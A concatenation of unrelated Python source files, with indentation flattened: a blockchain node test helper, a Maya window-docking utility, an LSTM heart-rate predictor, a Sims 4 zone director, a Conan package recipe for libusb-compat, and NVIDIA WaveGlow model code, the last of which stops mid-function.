# retMap["stdout"]=ex.stdout
# retMap["stderr"]=ex.stderr
return retMap
if shouldFail:
Utils.Print("ERROR: The publish contract did not fail as expected.")
return None
Node.validateTransaction(trans)
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def getTableRows(self, contract, scope, table):
jsonData=self.getTable(contract, scope, table)
if jsonData is None:
return None
rows=jsonData["rows"]
return rows
def getTableRow(self, contract, scope, table, idx):
if idx < 0:
Utils.Print("ERROR: Table index cannot be negative. idx: %d" % (idx))
return None
rows=self.getTableRows(contract, scope, table)
if rows is None or idx >= len(rows):
Utils.Print("ERROR: Retrieved table does not contain row %d" % idx)
return None
row=rows[idx]
return row
def getTableColumns(self, contract, scope, table):
row=self.getTableRow(contract, scope, table, 0)
keys=list(row.keys())
return keys
    # returns tuple: (success flag, transaction json on success or error message on failure)
def pushMessage(self, account, action, data, opts, silentErrors=False):
cmd="%s %s push action -j %s %s" % (Utils.EnuClientPath, self.endpointArgs, account, action)
cmdArr=cmd.split()
if data is not None:
cmdArr.append(data)
if opts is not None:
cmdArr += opts.split()
s=" ".join(cmdArr)
if Utils.Debug: Utils.Print("cmd: %s" % (s))
try:
trans=Utils.runCmdArrReturnJson(cmdArr)
return (True, trans)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
if not silentErrors:
Utils.Print("ERROR: Exception during push message. %s" % (msg))
return (False, msg)
def setPermission(self, account, code, pType, requirement, waitForTransBlock=False):
cmd="%s %s set action permission -j %s %s %s %s" % (
Utils.EnuClientPath, self.endpointArgs, account, code, pType, requirement)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during set permission. %s" % (msg))
return None
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def delegatebw(self, fromAccount, netQuantity, cpuQuantity, toAccount=None, transferTo=False, waitForTransBlock=False):
if toAccount is None:
toAccount=fromAccount
specificCmd="system delegatebw"
transferStr="--transfer" if transferTo else ""
cmd="%s %s %s -j %s %s \"%s %s\" \"%s %s\" %s" % (
Utils.EnuClientPath, self.endpointArgs, specificCmd, fromAccount.name, toAccount.name, netQuantity, CORE_SYMBOL, cpuQuantity, CORE_SYMBOL, transferStr)
return self.processCmd(cmd, specificCmd, waitForTransBlock)
def regproducer(self, producer, url, location, waitForTransBlock=False):
specificCmd="system regproducer"
cmd="%s %s %s -j %s %s %s %s" % (
Utils.EnuClientPath, self.endpointArgs, specificCmd, producer.name, producer.activePublicKey, url, location)
return self.processCmd(cmd, specificCmd, waitForTransBlock)
def vote(self, account, producers, waitForTransBlock=False):
specificCmd = "system voteproducer prods"
cmd="%s %s %s -j %s %s" % (
Utils.EnuClientPath, self.endpointArgs, specificCmd, account.name, " ".join(producers))
return self.processCmd(cmd, specificCmd, waitForTransBlock)
def processCmd(self, cmd, cmdDesc, waitForTransBlock):
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during %s. %s" % (cmdDesc, msg))
return None
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def getInfo(self, silentErrors=False):
cmd="%s %s get info" % (Utils.EnuClientPath, self.endpointArgs)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd, silentErrors=silentErrors)
return trans
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get info. %s" % (msg))
return None
def getBlockFromDb(self, idx):
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand="db.blocks.find().sort({\"_id\":%d}).limit(1).pretty()" % (idx)
if Utils.Debug: Utils.Print("cmd: echo \"%s\" | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db block. %s" % (msg))
return None
def checkPulse(self):
info=self.getInfo(True)
return False if info is None else True
def getHeadBlockNum(self):
"""returns head block number(string) as returned by enucli get info."""
if not self.enableMongo:
info=self.getInfo()
if info is not None:
headBlockNumTag="head_block_num"
return info[headBlockNumTag]
else:
# Either this implementation or the one in getIrreversibleBlockNum are likely wrong.
block=self.getBlockFromDb(-1)
if block is not None:
blockNum=block["block_num"]
return blockNum
return None
def getIrreversibleBlockNum(self):
if not self.enableMongo:
info=self.getInfo()
if info is not None:
return info["last_irreversible_block_num"]
else:
# Either this implementation or the one in getHeadBlockNum are likely wrong.
block=self.getBlockFromDb(-1)
if block is not None:
blockNum=block["block_num"]
return blockNum
return None
def kill(self, killSignal):
if Utils.Debug: Utils.Print("Killing node: %s" % (self.cmd))
assert(self.pid is not None)
try:
os.kill(self.pid, killSignal)
except OSError as ex:
Utils.Print("ERROR: Failed to kill node (%d)." % (self.cmd), ex)
return False
# wait for kill validation
def myFunc():
try:
os.kill(self.pid, 0) #check if process with pid is running
except OSError as _:
return True
return False
if not Utils.waitForBool(myFunc):
Utils.Print("ERROR: Failed to validate node shutdown.")
return False
# mark node as killed
self.pid=None
self.killed=True
return True
# TBD: make nodeId an internal property
# pylint: disable=too-many-locals
def relaunch(self, nodeId, chainArg, newChain=False, timeout=Utils.systemWaitTimeout):
assert(self.pid is None)
assert(self.killed)
if Utils.Debug: Utils.Print("Launching node process, Id: %d" % (nodeId))
cmdArr=[]
myCmd=self.cmd
if not newChain:
skip=False
for i in self.cmd.split():
Utils.Print("\"%s\"" % (i))
if skip:
skip=False
continue
if "--genesis-json" == i or "--genesis-timestamp" == i:
skip=True
continue
cmdArr.append(i)
myCmd=" ".join(cmdArr)
dataDir="var/lib/node_%02d" % (nodeId)
dt = datetime.datetime.now()
dateStr="%d_%02d_%02d_%02d_%02d_%02d" % (
dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
stdoutFile="%s/stdout.%s.txt" % (dataDir, dateStr)
stderrFile="%s/stderr.%s.txt" % (dataDir, dateStr)
with open(stdoutFile, 'w') as sout, open(stderrFile, 'w') as serr:
#cmd=self.cmd + ("" if chainArg is None else (" " + chainArg))
cmd=myCmd + ("" if chainArg is None else (" " + chainArg))
Utils.Print("cmd: %s" % (cmd))
popen=subprocess.Popen(cmd.split(), stdout=sout, stderr=serr)
self.pid=popen.pid
def isNodeAlive():
"""wait for node to be responsive."""
try:
return True if self.checkPulse() else False
except (TypeError) as _:
pass
return False
isAlive=Utils.waitForBool(isNodeAlive, timeout)
if isAlive:
Utils.Print("Node relaunch was successfull.")
else:
Utils.Print("ERROR: Node relaunch Failed.")
self.pid=None
return False
self.killed=False
return True
|
"""Make any window dockable within Maya.
:created: 8 Jun 2018
:author: Benoit Gielly <benoit.gielly@gmail.com>
"""
from PySide2.QtCore import QObject
from maya import cmds, mel
from . import utils
def dock_widget(widget, label="DockWindow", area="right", floating=False):
"""Dock the given widget properly for both M2016 and 2017+."""
# convert widget to Qt if needed
if not issubclass(widget.__class__, QObject):
widget = utils.to_qwidget(widget)
# make sure our widget has a name
name = widget.objectName()
if not name:
name, num = label + "_mainWindow", 1
while cmds.control(name, exists=True):
name = label + "_mainWindow" + str(num)
num += 1
widget.setObjectName(label + "_mainWindow")
# if `floating` is True, return with `widget.show()`
if floating is True:
if not widget.windowTitle():
widget.setWindowTitle(label)
widget.show()
return widget
# make sure the workspaceControl doesn't exist yet
control = name + "_WorkspaceControl"
if cmds.control(control, exists=True):
cmds.deleteUI(control)
# create workspaceControl (only works with Maya 2017+)
flags = {"dockToControl": ["ToolBox", "right"]}
if area == "right":
# If the ChannelBox is not visible, fallback on the AttributeEditor.
_control = "ChannelBoxLayerEditor"
if not cmds.workspaceControl(_control, query=True, visible=True):
_control = "AttributeEditor"
flags = {"tabToControl": [_control, -1]}
control = cmds.workspaceControl(control)
cmds.workspaceControl(control, edit=True, label=label, r=True, **flags)
# Convert workspace to Qt and add the widget into its layout.
workspace = utils.to_qwidget(control)
layout = workspace.layout()
layout.addWidget(widget)
return widget
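# Example usage (illustrative sketch; the tool widget below is hypothetical):
#   from PySide2.QtWidgets import QWidget
#   tool = QWidget()
#   tool.setObjectName("myToolWindow")
#   dock_widget(tool, label="My Tool", area="right", floating=False)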
def get_available_controls():
"""Return all the available Controls in list.
Returns:
list: List of existing workspaceControls.
"""
if not hasattr(cmds, "workspaceControl"):
return []
tools = mel.eval("$ctrl_tmp_var = $gUIComponentToolBarArray;")
docks = mel.eval("$ctrl_tmp_var = $gUIComponentDockControlArray;")
controls = sorted(
{x for x in tools + docks if cmds.workspaceControl(x, exists=True)}
)
return controls
|
# load and plot dataset
import numpy
#import matplotlib.pyplot as plt
import matplotlib.axes as axes
import pandas
import math
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
import pylab
from matplotlib.pyplot import show
from matplotlib import pyplot as plt
from matplotlib.animation import FuncAnimation
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import Tkinter
look_back = 200
class PulsePre:
def __init__(self,root):
self.plt=plt
self.plt.subplots_adjust(left=0.5, bottom=0.8, right=0.9, top=0.9, wspace=0.9, hspace=0.9)
self.plt.ion()
self.model=[]
self.oripredict=[]
self.oriplot=[]
self.x1=0
self.t1,self.t2,self.t3,self.v,self.v2,self.v3=[],[],[],[],[],[]
#self.plt.subplots_adjust(left=0.125, bottom=0.1, right=0.9, top=0.9, wspace=0.2, hspace=0.2)
frame = Tkinter.Frame(root)
self.fig = Figure()
#self.fig.canvas.set_window_title('Predicted Heart Rate vs Real time Heart Rate')
self.ax1 = self.fig.add_subplot(221)
self.ax1.set_title("Predicted Heart Rate")
self.ax2 = self.fig.add_subplot(222)
self.ax2.set_title("Real time Heart Rate")
self.ax3 = self.fig.add_subplot(223)
self.ax3.set_title("Difference between Heart Rate")
self.ax3.set_position([0.1,0.05, 0.5, 0.35])
#self.ax3.subplots_adjust(left=0.5, bottom=0.8, right=0.9, top=0.9, wspace=0.9, hspace=0.9)
self.line, = self.ax1.plot(self.t2,self.v, linestyle="-", color="r")
self.lineone, = self.ax2.plot(self.t1,self.v2, linestyle="-", color="r")
self.linetwo, = self.ax3.plot(self.t2,self.v3, linestyle="-", color="r")
self.canvas = FigureCanvasTkAgg(self.fig,master=root)
self.canvas.show()
self.canvas.get_tk_widget().pack(side='top', fill='both', expand=1)
frame.pack()
self.score=0
    def floatconv(self, pulse):
        # convert readings to float and drop empty strings
        return [float(i) for i in pulse if i != '']
def create_dataset(self,dataset, look_back):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return numpy.array(dataX), numpy.array(dataY)
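    # Illustrative example of create_dataset (a sketch): with look_back=2 and a dataset column
    # [1, 2, 3, 4, 5], it returns X=[[1, 2], [2, 3]] and Y=[3, 4]; the final window is dropped
    # because of the extra -1 in the range.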
def rewrite(self):
fo = open('pulse.txt','r')
n = open('pulse.txt', 'a')
pulse=fo.read().split(' ')
rm=open('pulse.txt', 'w').close()
del pulse[-1],pulse[0:999]
for i in pulse:
n.write(i+' ')
def updateData(self,num):
#del firstdata
fo = open('pulse.txt','r')
pulse=fo.read().split(' ')
num=-num-200
del pulse[-1],pulse[0:num]
pulse=self.floatconv(pulse)
pulselast=pulse[-1]
#print 'lat: ',pulselast
#time=[]
a=0
'''for i in pulse:
time.append(round(a,1))
a+=0.3'''
pulse=numpy.array(pulse)
pulse= numpy.reshape(pulse, (-1, 1))
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(pulse)
# split into train and test sets
train_size = int(len(dataset) * 0.67)
test_size = len(dataset) - train_size
train, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]
# reshape into X=t and Y=t+1
#look_back = 200#predict for future 1 minute
trainX, trainY = self.create_dataset(train, look_back)
testX, testY = self.create_dataset(test, look_back)
datasetX, datasetY = self.create_dataset(dataset, look_back)
oritestX=datasetX
trainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
return trainX,trainY,testX,testY,oritestX,scaler,pulselast
def trainmodel(self,trainX,trainY,testX,testY,scaler):
# create and fit the LSTM network
model = Sequential()
model.add(LSTM(4, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=1, batch_size=1, verbose=2)
# make predictions
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
#scaler = MinMaxScaler(feature_range=(0, 1))
# invert predictions
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
# calculate root mean squared error
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
#print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
#print('Test Score: %.2f RMSE' % (testScore))
return model
def predictapp(self,num,oritestX,model,scaler):
futureX=oritestX
futureX = numpy.reshape(futureX, (futureX.shape[0], 1, futureX.shape[1]))
#print futureX
futurePredict=model.predict(futureX)
futurePredict=scaler.inverse_transform(futurePredict)
futurePredict=futurePredict.ravel()
return futurePredict
def p(self,a, b,oritestX,pulselast):
self.t1.append(a)
self.t2.append(a+1)
self.v.append(b)#predicted
self.v2.append(numpy.array(float(pulselast)))#realtime
#print 'v ',self.v
#print 'v2 ',self.v2
if a>=0.995:
self.t3.append(a)
print self.v[-200]
self.v3.append(abs(float(pulselast)-self.v[-200]))#difference
self.ax3.set_xlim(min(self.t3), max(self.t3) + 1)
self.linetwo.set_data(self.t3, self.v3)
self.ax3.set_ylim(0,20)
self.ax1.set_xlim(min(self.t2), max(self.t2) + 1)
self.ax1.set_ylim(0, 100)
self.ax2.set_xlim(min(self.t1), max(self.t1) + 1)
self.ax2.set_ylim(0,100)
self.line.set_data(self.t2, self.v)
#self.plt.pause(0.001)
#self.ax1.figure.canvas.draw()
self.lineone.set_data(self.t1, self.v2)
self.canvas.draw()
#self.ax2.figure.canvas.draw()
# shift train predictions for plotting
def accuracy(self):
self.score = math.sqrt(mean_squared_error(self.v, self.v2))
return self.score
def plotpulse(self,num):
trainX,trainY,testX,testY,oritestX,scaler,pulselast=self.updateData(num)
if num==-201:
self.model.append(self.trainmodel(trainX,trainY,testX,testY,scaler))
        if (num+201)%(-100)==0 and num!=-201: # update accuracy every 30s
score=self.accuracy()
futurePredict=self.predictapp(num,oritestX[-200:],self.model[0],scaler)
self.p(self.x1,futurePredict[-1],oritestX,pulselast)
self.x1=self.x1+0.005
return self.score
|
from careers.career_event_zone_director import CareerEventZoneDirector
import sims4.log
logger = sims4.log.Logger('Crime Scene', default_owner='bhill')
class CrimeSceneZoneDirector(CareerEventZoneDirector):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._should_load_sims = False
def _load_custom_zone_director(self, zone_director_proto, reader):
self._should_load_sims = True
super()._load_custom_zone_director(zone_director_proto, reader)
def _on_maintain_zone_saved_sim(self, sim_info):
if self._should_load_sims:
super()._on_maintain_zone_saved_sim(sim_info)
else:
logger.info('Discarding saved sim: {}', sim_info)
def _process_injected_sim(self, sim_info):
logger.info('Discarding injected sim: {}', sim_info)
|
from conans import ConanFile, AutoToolsBuildEnvironment, CMake, tools
from conans.errors import ConanException
from contextlib import contextmanager
import os
import re
import shlex
import shutil
required_conan_version = ">=1.33.0"
class LibUSBCompatConan(ConanFile):
name = "libusb-compat"
description = "A compatibility layer allowing applications written for libusb-0.1 to work with libusb-1.0"
license = ("LGPL-2.1", "BSD-3-Clause")
homepage = "https://github.com/libusb/libusb-compat-0.1"
url = "https://github.com/conan-io/conan-center-index"
exports_sources = "patches/**", "CMakeLists.txt.in"
topics = ("conan", "libusb", "compatibility", "usb")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
"enable_logging": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
"enable_logging": False,
}
generators = "cmake", "pkg_config"
_autotools = None
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def requirements(self):
self.requires("libusb/1.0.24")
if self.settings.compiler == "Visual Studio":
self.requires("dirent/1.23.2")
@property
def _settings_build(self):
return self.settings_build if hasattr(self, "settings_build") else self.settings
def build_requirements(self):
self.build_requires("gnu-config/cci.20201022")
self.build_requires("libtool/2.4.6")
self.build_requires("pkgconf/1.7.4")
if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"):
self.build_requires("msys2/cci.latest")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _iterate_lib_paths_win(self, lib):
"""Return all possible library paths for lib"""
for lib_path in self.deps_cpp_info.lib_paths:
for prefix in "", "lib":
for suffix in "", ".a", ".dll.a", ".lib", ".dll.lib":
fn = os.path.join(lib_path, "{}{}{}".format(prefix, lib, suffix))
if not fn.endswith(".a") and not fn.endswith(".lib"):
continue
yield fn
@property
def _absolute_dep_libs_win(self):
absolute_libs = []
for lib in self.deps_cpp_info.libs:
for fn in self._iterate_lib_paths_win(lib):
if not os.path.isfile(fn):
continue
absolute_libs.append(fn)
break
return absolute_libs
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.configure(source_dir=os.path.join(self._source_subfolder, "libusb"))
return self._cmake
def _configure_autotools(self):
if self._autotools:
return self._autotools
self._autotools = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows)
if self.settings.compiler == "Visual Studio":
# Use absolute paths of the libraries instead of the library names only.
            # Otherwise, the configure script will report that the compiler is not working
            # (because it interprets the libs as input source files).
self._autotools.libs = list(tools.unix_path(l) for l in self._absolute_dep_libs_win) + self.deps_cpp_info.system_libs
conf_args = [
"--disable-examples-build",
"--enable-log" if self.options.enable_logging else "--disable-log",
]
if self.options.shared:
conf_args.extend(["--enable-shared", "--disable-static"])
else:
conf_args.extend(["--disable-shared", "--enable-static"])
pkg_config_paths = [tools.unix_path(os.path.abspath(self.install_folder))]
self._autotools.configure(args=conf_args, configure_dir=self._source_subfolder, pkg_config_paths=pkg_config_paths)
return self._autotools
@contextmanager
def _build_context(self):
if self.settings.compiler == "Visual Studio":
with tools.vcvars(self.settings):
env = {
"CC": "{} cl -nologo".format(tools.unix_path(self.deps_user_info["automake"].compile)),
"CXX": "{} cl -nologo".format(tools.unix_path(self.deps_user_info["automake"].compile)),
"LD": "link -nologo",
"AR": "{} lib".format(tools.unix_path(self.deps_user_info["automake"].ar_lib)),
"DLLTOOL": ":",
"OBJDUMP": ":",
"RANLIB": ":",
"STRIP": ":",
}
with tools.environment_append(env):
yield
else:
yield
def _extract_makefile_variable(self, makefile, variable):
makefile_contents = tools.load(makefile)
match = re.search("{}[ \t]*=[ \t]*((?:(?:[a-zA-Z0-9 \t.=/_-])|(?:\\\\\"))*(?:\\\\\n(?:(?:[a-zA-Z0-9 \t.=/_-])|(?:\\\"))*)*)\n".format(variable), makefile_contents)
if not match:
raise ConanException("Cannot extract variable {} from {}".format(variable, makefile_contents))
lines = [line.strip(" \t\\") for line in match.group(1).split()]
return [item for line in lines for item in shlex.split(line) if item]
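    # Illustrative example (a sketch): for a Makefile.am containing
    #   libusb_la_SOURCES = core.c \
    #       usb.c
    # _extract_makefile_variable(makefile, "libusb_la_SOURCES") would return ["core.c", "usb.c"].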
def _extract_autotools_variables(self):
makefile = os.path.join(self._source_subfolder, "libusb", "Makefile.am")
sources = self._extract_makefile_variable(makefile, "libusb_la_SOURCES")
headers = self._extract_makefile_variable(makefile, "include_HEADERS")
return sources, headers
def _patch_sources(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
shutil.copy(self._user_info_build["gnu-config"].CONFIG_SUB,
os.path.join(self._source_subfolder, "config.sub"))
shutil.copy(self._user_info_build["gnu-config"].CONFIG_GUESS,
os.path.join(self._source_subfolder, "config.guess"))
if self.settings.os == "Windows":
api = "__declspec(dllexport)" if self.options.shared else ""
tools.replace_in_file(os.path.join(self._source_subfolder, "configure.ac"),
"\nAC_DEFINE([API_EXPORTED]",
"\nAC_DEFINE([API_EXPORTED], [{}], [API])\n#".format(api))
# libtool disallows building shared libraries that link to static libraries
# This will override this and add the dependency
tools.replace_in_file(os.path.join(self._source_subfolder, "ltmain.sh"),
"droppeddeps=yes", "droppeddeps=no && func_append newdeplibs \" $a_deplib\"")
@property
def _user_info_build(self):
return getattr(self, "user_info_build", None) or self.deps_user_info
def build(self):
self._patch_sources()
with self._build_context():
autotools = self._configure_autotools()
if self.settings.os == "Windows":
cmakelists_in = tools.load("CMakeLists.txt.in")
sources, headers = self._extract_autotools_variables()
tools.save(os.path.join(self._source_subfolder, "libusb", "CMakeLists.txt"), cmakelists_in.format(
libusb_sources=" ".join(sources),
libusb_headers=" ".join(headers),
))
tools.replace_in_file("config.h", "\n#define API_EXPORTED", "\n#define API_EXPORTED //")
cmake = self._configure_cmake()
cmake.build()
else:
with self._build_context():
autotools.make()
def package(self):
self.copy("LICENSE", src=self._source_subfolder, dst="licenses")
if self.settings.os == "Windows":
cmake = self._configure_cmake()
cmake.install()
else:
with self._build_context():
autotools = self._configure_autotools()
autotools.install()
os.unlink(os.path.join(self.package_folder, "bin", "libusb-config"))
os.unlink(os.path.join(self.package_folder, "lib", "libusb.la"))
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
def package_info(self):
self.cpp_info.names["pkg_config"] = "libusb"
self.cpp_info.libs = ["usb"]
if not self.options.shared:
self.cpp_info.defines = ["LIBUSB_COMPAT_STATIC"]
|
# *****************************************************************************
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# *****************************************************************************
import copy
import torch
from torch.autograd import Variable
import torch.nn.functional as F
@torch.jit.script
def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels):
n_channels_int = n_channels[0]
in_act = input_a+input_b
t_act = torch.tanh(in_act[:, :n_channels_int, :])
s_act = torch.sigmoid(in_act[:, n_channels_int:, :])
acts = t_act * s_act
return acts
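# Note: this is the WaveNet-style gated activation. The first n_channels of (input_a + input_b)
# act as the "filter" (tanh) and the remaining n_channels as the "gate" (sigmoid); the two halves
# are multiplied elementwise, i.e. acts = tanh(z[:, :n, :]) * sigmoid(z[:, n:, :]).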
class WaveGlowLoss(torch.nn.Module):
def __init__(self, sigma=1.0):
super(WaveGlowLoss, self).__init__()
self.sigma = sigma
def forward(self, model_output):
z, log_s_list, log_det_W_list = model_output
for i, log_s in enumerate(log_s_list):
if i == 0:
log_s_total = torch.sum(log_s)
log_det_W_total = log_det_W_list[i]
else:
log_s_total = log_s_total + torch.sum(log_s)
log_det_W_total += log_det_W_list[i]
loss = torch.sum(z*z)/(2*self.sigma*self.sigma) - log_s_total - log_det_W_total
return loss/(z.size(0)*z.size(1)*z.size(2))
class Invertible1x1Conv(torch.nn.Module):
"""
The layer outputs both the convolution, and the log determinant
of its weight matrix. If reverse=True it does convolution with
inverse
"""
def __init__(self, c):
super(Invertible1x1Conv, self).__init__()
self.conv = torch.nn.Conv1d(c, c, kernel_size=1, stride=1, padding=0,
bias=False)
# Sample a random orthonormal matrix to initialize weights
W = torch.qr(torch.FloatTensor(c, c).normal_())[0]
# Ensure determinant is 1.0 not -1.0
if torch.det(W) < 0:
W[:,0] = -1*W[:,0]
W = W.view(c, c, 1)
self.conv.weight.data = W
def forward(self, z, reverse=False):
# shape
batch_size, group_size, n_of_groups = z.size()
W = self.conv.weight.squeeze()
if reverse:
if not hasattr(self, 'W_inverse'):
# Reverse computation
W_inverse = W.float().inverse()
W_inverse = Variable(W_inverse[..., None])
if z.type() == 'torch.cuda.HalfTensor':
W_inverse = W_inverse.half()
self.W_inverse = W_inverse
z = F.conv1d(z, self.W_inverse, bias=None, stride=1, padding=0)
return z
else:
# Forward computation
log_det_W = batch_size * n_of_groups * torch.logdet(W)
z = self.conv(z)
return z, log_det_W
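# Illustrative use of Invertible1x1Conv (a sketch; z has shape batch x channels x n_groups):
#   conv = Invertible1x1Conv(8)
#   y, log_det_W = conv(z)          # forward: 1x1 conv plus batch_size * n_of_groups * log|det W|
#   z_rec = conv(y, reverse=True)   # applies W^-1, recovering z up to numerical error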
class WN(torch.nn.Module):
"""
This is the WaveNet like layer for the affine coupling. The primary difference
from WaveNet is the convolutions need not be causal. There is also no dilation
size reset. The dilation only doubles on each layer
"""
def __init__(self, n_in_channels, n_mel_channels, n_layers, n_channels,
kernel_size):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
assert(n_channels % 2 == 0)
self.n_layers = n_layers
self.n_channels = n_channels
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
start = torch.nn.Conv1d(n_in_channels, n_channels, 1)
start = torch.nn.utils.weight_norm(start, name='weight')
self.start = start
# Initializing last layer to 0 makes the affine coupling layers
# do nothing at first. This helps with training stability
end = torch.nn.Conv1d(n_channels, 2*n_in_channels, 1)
end.weight.data.zero_()
end.bias.data.zero_()
self.end = end
cond_layer = torch.nn.Conv1d(n_mel_channels, 2*n_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = 2 ** i
padding = int((kernel_size*dilation - dilation)/2)
in_layer = torch.nn.Conv1d(n_channels, 2*n_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2*n_channels
else:
res_skip_channels = n_channels
res_skip_layer = torch.nn.Conv1d(n_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, forward_input):
audio, spect = forward_input
audio = self.start(audio)
output = torch.zeros_like(audio)
n_channels_tensor = torch.IntTensor([self.n_channels])
spect = self.cond_layer(spect)
for i in range(self.n_layers):
spect_offset = i*2*self.n_channels
acts = fused_add_tanh_sigmoid_multiply(
self.in_layers[i](audio),
spect[:,spect_offset:spect_offset+2*self.n_channels,:],
n_channels_tensor)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
audio = audio + res_skip_acts[:,:self.n_channels,:]
output = output + res_skip_acts[:,self.n_channels:,:]
else:
output = output + res_skip_acts
return self.end(output)
class WaveGlow(torch.nn.Module):
def __init__(self, n_mel_channels, n_flows, n_group, n_early_every,
n_early_size, WN_config):
super(WaveGlow, self).__init__()
self.upsampling = torch.nn.ConvTranspose1d(n_mel_channels,
n_mel_channels,
512, stride=160)
assert(n_group % 2 == 0)
self.n_flows = n_flows
self.n_group = n_group
self.n_early_every = n_early_every
self.n_early_size = n_early_size
self.WN = torch.nn.ModuleList()
self.convinv = torch.nn.ModuleList()
n_half = int(n_group/2)
# Set up layers with the right sizes based on how many dimensions
# have been output already
n_remaining_channels = n_group
for k in range(n_flows):
if k % self.n_early_every == 0 and k > 0:
n_half = n_half - int(self.n_early_size/2)
n_remaining_channels = n_remaining_channels - self.n_early_size
self.convinv.append(Invertible1x1Conv(n_remaining_channels))
self.WN.append(WN(n_half, n_mel_channels*n_group, **WN_config))
self.n_remaining_channels = n_remaining_channels # Useful during inference
def forward(self, forward_input):
"""
forward_input[0] = mel_spectrogram: batch x n_mel_channels x frames
forward_input[1] = audio: batch x time
"""
spect, audio = forward_input
# Upsample spectrogram to size of audio
spect = self.upsampling(spect)
assert(spect.size(2) >= audio.size(1))
if spect.size(2) > audio.size(1):
spect = spect[:, :, :audio.size(1)]
